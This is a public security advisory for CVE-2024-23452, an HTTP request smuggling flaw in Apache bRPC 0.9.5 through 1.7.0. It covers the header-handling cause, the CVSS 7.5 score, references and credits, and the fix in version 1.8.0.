Request Smuggling Vulnerability in Apache bRPC 0.9.5~1.7.0
CVE-2024-23452

7.5HIGH

Key Information:

Vendor
Apache
Status
Apache bRPC
Vendor
CVE Published:
8 February 2024

Summary

A request smuggling vulnerability exists in the HTTP server component of Apache bRPC versions 0.9.5 to 1.7.0 across all platforms. This issue is primarily caused by the improper handling of HTTP headers, wherein both Transfer-Encoding and Content-Length header fields can be present in a single HTTP request. Such a request may suggest malicious attempts at request smuggling or response splitting. When an Apache bRPC server is misconfigured to handle persistent connections under these conditions, an attacker could exploit this vulnerability to inject unauthorized requests into connections meant for the backend server. The vulnerability arises due to non-compliance with the RFC-7230 specification for HTTP/1.1. To mitigate the risk associated with this vulnerability, it is recommended to upgrade to Apache bRPC version 1.8.0 or later, where this issue has been addressed.

Affected Version(s)

Apache bRPC 0.9.5 < 1.8.0

References

https://github.com/apache/brpc/releases/tag/1.8.0
release-notes
https://github.com/apache/brpc/pull/2518
patch
https://lists.apache.org/thread/kkvdpwyr2s2yt9qvvxfdzon01...
vendor-advisory

CVSS V3.1

Score:
7.5
Severity:
HIGH
Confidentiality:
None
Integrity:
High
Availability:
None
Attack Vector:
Network
Attack Complexity:
Low
Privileges Required:
None
User Interaction:
None
Scope:
Unchanged

Timeline

  • Vulnerability published

  • Vulnerability Reserved

Credit

Pingtao Wei of 2012 Laboratories
Ziyang Chen of 2012 Laboratories
Haoran Zhi of 2012 Laboratories
Hongpei Li of 2012 Laboratories
.